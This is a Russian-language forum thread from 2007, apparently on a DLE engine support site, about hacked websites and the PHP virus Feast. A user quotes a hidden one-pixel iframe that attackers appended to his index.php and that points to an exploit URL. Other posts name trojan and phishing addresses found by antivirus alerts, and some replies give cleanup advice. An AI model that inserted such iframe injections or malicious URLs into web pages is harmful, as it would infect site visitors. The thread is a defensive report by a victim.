Перейти к публикации

Рекомендованные сообщения

а как на счет. Будет ли закрыто в этом скрипте "«php.faces»''

Virus.PHP. Feast.a

02 июля, 2007

Скриптовый вирус, заражающий файлы с расширением «.php». Имеет размер 1251 байт. Написан на PHP.

Деструктивная активность

При запуске вирус ищет в рабочей папке и в папке на уровень выше файлы с расширением «.php». В найденных файлах вредоносная программа проверяет наличие строки «php.faces». Если строка отсутствует, вирус записывает в конец заражаемых файлов свое тело и завершает работу.

Другие названия

Virus.PHP.Feast.a («Лаборатория Касперского») также известен как: PHP/Faces (McAfee), PHP.Feast (Symantec), PHP/Faces.A (FRISK), PHP/Feast (Grisoft), PHP.Faces.A (SOFTWIN), PHP.Faces.A (ClamAV), PHP/Faces.A (Eset)

источник http://www.securitylab.ru/virus/298674.php

Ссылка на сообщение
Поделиться на других сайтах

на сайте источника ничего больше не указано

мне всунули ссылку на "ht*p://1com.ws/exp/index.php обнаружено: троянская программа 'Trojan-Downloader.JS.Agent.ep'

Изменено пользователем Mihailves
Ссылка на сообщение
Поделиться на других сайтах

Mihailves,

Меня на какойто айпи скинуло и единственное, так это у м еня антифишинг сработал на адрес _http://81.95.149.235/favicon.ico

Ссылка на сообщение
Поделиться на других сайтах

Mihailves,

1. Компьютер на полную проверку от вирусов.

2. Сменить все пароли (мыла, аськи, фтп - абсолютно ВСЕ!).

3. Использовать Mozilla Firefox v2.0 вместо IE.

Ссылка на сообщение
Поделиться на других сайтах

mc -aiZer- ($) Спасибо за совет, я уже стреляный волк! прошел и не такое.

я просто не нашел в движке строчку «php.faces» вот и написал в форуме, чтоб обратили внимание и если эта проблема касается DLE то ...

Ссылка на сообщение
Поделиться на других сайтах

Выходить-то выходят, но не многие на сайтах увидешь... Чаще всего это скрипты на разгон трафика, антивирусы на них тоже реагируют...

Ссылка на сообщение
Поделиться на других сайтах

и вот сегодня мне снова в конце index.php вписали вот такую строчку

<!-- ~ --><iframe style="border: none" width="1" height="1" src="ht*tp://1com.ws/exp/index.php" style="border: 0;"></iframe><!-- ~ -->

а это адресок кидает "09.07.2007 6:35:34 URL: ht*p://shakespearecollege.com/ipublish/data/pdf/blog627u0f/index.php обнаружено: троянская программа 'Trojan-Clicker.HTML.IFrame.p'

"

или еще куда-то

А вы говорите ерунда !

не знаю правильно или нет но я поставил на файл атрибут "только чтение". Теперь посмотрим!!!!

Ссылка на сообщение
Поделиться на других сайтах

не знаю правильно или нет но я поставил на файл атрибут "только чтение". Теперь посмотрим!!!!

Павильно, только проверь еще все компьютеры с которых выходишь по ФТП на наличие троянов и смени пароль на ФТП.

Ссылка на сообщение
Поделиться на других сайтах

Да народ зря не реагируете на мои сообщения вот и ht**://pc-news.ru/soft/ уже распространяет всякую заражу вот что каспер показывает

09.07.2007 20:53:42 http://ltraffic.biz/resource.php?id=4326&user=atata запрещен

запрещено: фишинг-адрес http://ltraffic.biz/* URL: http://ltraffic.biz/resource.php?id=4326&user=atata

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...